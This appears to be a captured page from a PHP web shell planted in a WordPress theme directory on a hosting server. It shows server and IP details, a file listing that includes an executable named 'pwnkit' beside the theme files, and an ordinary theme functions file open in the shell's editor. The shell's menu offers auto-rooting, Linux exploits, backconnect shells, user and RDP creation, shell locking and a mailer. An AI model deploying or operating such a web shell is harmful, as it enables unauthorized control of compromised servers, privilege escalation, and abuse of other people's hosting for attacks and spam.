Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
blue-taste /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
331
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.98
KB
-rw-r--r--
comments.php
1.49
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
dd_ie.js
568
B
-rw-r--r--
footer.php
563
B
-rw-r--r--
functions.php
1.46
KB
-rw-r--r--
functionsbak.php
995
B
-rw-r--r--
header.php
1.89
KB
-rw-r--r--
index.php
2.18
KB
-rw-r--r--
license.txt
15.05
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
47.83
KB
-rw-r--r--
search.php
1.62
KB
-rw-r--r--
searchform.php
377
B
-rw-r--r--
sidebar.php
812
B
-rw-r--r--
style.css
13.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functionsbak.php
<?php /* * Blue Taste Wordpress Theme By Jabox (http://www.jabox.com.ar) */ ?> <?php if (!isset($content_width)) $content_width = 640; function register_my_menus() { if ( function_exists( 'register_nav_menu' ) ) { register_nav_menus( array( 'custom_nav_menu' => __( 'Custom Navigation Top Menu' ) ) ); } } add_action( 'init', 'register_my_menus' ); if (function_exists('add_theme_support') ) { add_theme_support('automatic-feed-links'); add_theme_support( 'post-thumbnails' ); } if ( function_exists('register_sidebar') ) register_sidebar(array( 'before_widget' => '<div class="widget-box">', 'after_widget' => '</div>', 'before_title' => '<h2>', 'after_title' => '</h2>', )); function widget_basic_theme_search() { echo '<div class="separator"></div>'; get_search_form(); } if (function_exists('wp_register_sidebar_widget') ) wp_register_sidebar_widget(__('Search'),'Search', 'widget_basic_theme_search',''); ?>
Close